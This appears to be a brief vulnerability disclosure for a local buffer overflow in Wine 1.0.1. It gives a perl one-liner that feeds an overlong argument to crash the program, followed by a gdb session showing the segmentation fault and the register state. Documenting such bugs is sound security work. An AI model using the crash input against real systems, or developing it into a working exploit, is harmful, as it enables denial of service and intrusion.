Linux Wine v1.0.1 Local Buffer Overflow (PoC) Author : Jonathan Salwan Mail : submit [AT] shell-storm.org Web : http://www.shell-storm.org Wine installed/tested with : -ubuntu 8.10 (kernel 2.6.27) -gcc version 4.3.2 (Ubuntu 4.3.2-1ubuntu12) Proof of Concept: -------------------------------------------------------------------------------------- submit@submit-laptop:~$ wine --version wine-1.0.1 submit@submit-laptop:~$ wine `perl -e "print('AAAA'x10000)"` Erreur de segmentation submit@submit-laptop:~$ -------------------------------------------------------------------------------------- submit@submit-laptop:~$ gdb /usr/bin/wine GNU gdb 6.8-debian Copyright (C) 2008 Free Software Foundation, Inc. License GPLv3+: GNU GPL version 3 or later This is free software: you are free to change and redistribute it. There is NO WARRANTY, to the extent permitted by law. Type "show copying" and "show warranty" for details. This GDB was configured as "i486-linux-gnu"... (no debugging symbols found) (gdb) run `perl -e "print('AAAA'x10000)"` Starting program: /usr/bin/wine `perl -e "print('AAAA'x10000)"` (no debugging symbols found) (no debugging symbols found) (no debugging symbols found) (no debugging symbols found) [Thread debugging using libthread_db enabled] (no debugging symbols found) (no debugging symbols found) [New Thread 0xb7c346b0 (LWP 11082)] [New Thread 0xb7c33b90 (LWP 11087)] [Thread 0xb7c33b90 (LWP 11087) exited] [New process 11082] Executing new program: /usr/bin/wine-preloader (no debugging symbols found) warning: Cannot initialize thread debugging library: generic error warning: Cannot initialize thread debugging library: generic error [New process 11082] Program received signal SIGSEGV, Segmentation fault. 0x7bc42e9e in ?? () (gdb) i r eax 0x110108 1114376 ecx 0x17170 94576 edx 0x410041 4259905 ebx 0x7bc8aff4 2076749812 esp 0xbfded9c0 0xbfded9c0 ebp 0xbfded9e8 0xbfded9e8 esi 0x1411d0 1315280 edi 0x158340 1409856 eip 0x7bc42e9e 0x7bc42e9e eflags 0x10202 [ IF RF ] cs 0x73 115 ss 0x7b 123 ds 0x7b 123 es 0x7b 123 fs 0x33 51 gs 0x3b 59 (gdb) --------------------------------------------------------------------------------------